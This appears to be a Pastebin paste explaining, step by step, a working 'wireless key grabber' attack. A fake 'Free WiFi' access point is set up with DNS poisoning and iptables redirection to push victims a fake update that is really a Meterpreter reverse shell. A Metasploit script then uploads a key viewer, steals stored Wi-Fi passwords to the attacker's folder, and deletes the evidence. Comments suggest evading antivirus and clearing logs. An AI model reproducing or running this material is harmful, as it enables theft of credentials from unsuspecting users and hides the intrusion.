Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Wireless Key grabber -- how the script works
- hm2075@hotmail.com
- for bt4 pre final
- # Copying dhcpd.conf
- The first stage is copying the dhcpd.conf to its correct location
- Here is a peek at the dhcpd.conf
- ddns-update-style ad-hoc;
- default-lease-time 600;
- max-lease-time 7200;
- subnet 10.0.0.0 netmask 255.255.255.0 {
- option routers 10.0.0.1;
- option subnet-mask 255.255.255.0;
- option broadcast-address 10.0.0.0;
- option domain-name "example.com";
- option domain-name-servers 10.0.0.1;
- range dynamic-bootp 10.0.0.16 10.0.0.55;
- #range 10.0.0.20 10.0.0.50;
- }
- # FakeAP
- modprobe tun is required
- airmon-ng start interface --- this sets your interface into monitor mode
- airbase-ng -e "Free WiFi" mon0 -v ------ this starts a standard AP on mon0
- # Getting metasploit ready
- "Loading Metasploit with hb.rc"
- ./msfconsole -r /root/WK/hb.rc &
- lets have a look at hb.rc
- use exploit/multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp --- I created the meterpreter.exe earlier on port 28 i.e our fake update exe
- set LHOST 10.0.0.1
- set LPORT 28
- set AutoRunScript /root/WK/hb.rb ----- this is the script we want to run once the meterpreter.exe is loaded by the victim
- set ExitOnSession false ----- we dont want to exit
- show options
- exploit -j
- We shall have a quick look at hb.rb
- # Wireless key harvester using wireless key viewer"
- require 'rex'
- # Extract the host and port
- host,port = session.tunnel_peer.split(':')
- print_status("New session found on #{host}:#{port}...")
- # bin -- the name of our exe
- bin = "wkv.exe"
- # output of wireless key viewer -------- we want our txt file name to be random otherwise it will get overwritten
- out = Rex::Text.rand_text_alpha_upper(5) + ".txt"
- #destination for the keys in txt format
- dest = "/root/WK/keys/"
- #
- #
- #upload wireless key viewer --- modify it to bypass av's
- #
- #
- print_status("Uploading Wireless Key Viewer")
- #
- sleep(1)
- # We upload our file to go into system drive not c: because some can be D: etc etc
- client.fs.file.upload_file("%SystemDrive%\\#{bin}", "/root/WK/wkv.exe")
- #
- sleep(1)
- #
- print_status("Uploaded Wireless Key Viewer")
- #
- sleep(1)
- #
- #execute via cmd, output will be random name,
- #
- print_status("Executing wireless key viewer ")
- # We execute here
- client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stext /#{out}", nil, {'Hidden' => 'false'})
- #
- print_status("wkv file executed")
- #
- sleep(1)
- #
- #
- #download keys to our keys folder
- # and we download keys here
- print_status("Downloading keys to keys folder ")
- #
- client.fs.file.download_file("#{dest}#{out}", "%SystemDrive%\\#{out}")
- #
- print_status("Downloaded keys to keys folder ")
- #
- #
- #
- #delete uploaded files -- we can also clear logs here if we want to
- # and then we delete what we have done i.e delete wkv.exe and the txt file
- sleep(1)
- #
- print_status("Deleting uploaded files ")
- #
- client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{bin} ", nil, {'Hidden' => 'true'})
- #
- client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{out} ", nil, {'Hidden' => 'true'})
- #
- print_status("Have a nice day!!!!!! ")
- # Setting up IP tables and dhcp server
- echo "Setting up IPTABLES"
- ifconfig at0 up
- ifconfig lo up
- ifconfig at0 10.0.0.1 netmask 255.255.255.0
- ifconfig at0 mtu 1400
- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
- iptables -P FORWARD ACCEPT
- iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
- sleep 2
- /etc/init.d/dhcp3-server restart
- echo "IPTABLES updated and dhcp server started"
- sleep 2
- #start webserver --- I prefer lighttpd because I can use a custom conf file to change location of the index.html
- echo "starting webserver"
- /etc/init.d/lighttpd stop
- sleep 2
- lighttpd -f '/root/WK/lighttpd.conf'
- sleep 2
- echo "Web server started"
- sleep 2
- #start dns poison ---- this is straight forward, we just redirect our victims to our exploit page
- echo "Starting dns redirector"
- sleep 2
- cd /
- cd root/WK
- xterm -geometry 75x15+500+0 -T DNSPoison -e java ServerKernelMain 10.0.0.1 10.0.0.1&
- echo "DNS poison started, check DNS poison if victims are being redirected to our webserver"
- sleep 2
- echo "Check out /root/WK/keys folder, random text files should be generated which contains the victims wireless keys once they have been exploited"
- sleep 2
- echo "Opening WKV folder, keys will be uploaded in here"
- sleep 2
- konqueror --geometry 605x305+500+500 --select /root/WK/keys/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement